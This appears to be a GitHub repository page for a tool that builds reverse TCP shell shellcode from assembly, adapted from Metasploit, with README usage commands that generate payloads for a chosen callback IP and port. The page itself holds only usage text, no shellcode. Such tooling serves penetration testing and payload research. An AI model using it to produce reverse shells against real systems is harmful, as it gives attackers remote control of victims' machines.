Skip to content

nchgroup/asm-shell_reverse_tcp

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

ASM shell_reverse_tcp

Builder script expropriated to metasploit-framework (modified by Vay3t to allow custom IP/port/exitfunc for shellcode modding).

Help

$ python3 build.py                
Usage: build.py [clean|build|gen]
  clean                              - Clean .bin files
  build                              - Build shell_reverse_tcp
  gen <ip> <port> [thread|process]   - Generate revsh_<port>.bin

Examples

python3 build.py gen 192.168.1.100 4444 # default is thread exit
python3 build.py gen 192.168.1.100 4444 thread
python3 build.py gen 192.168.1.100 8080 process

Reference

About

shell_reverse_tcp asm to shellcode

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published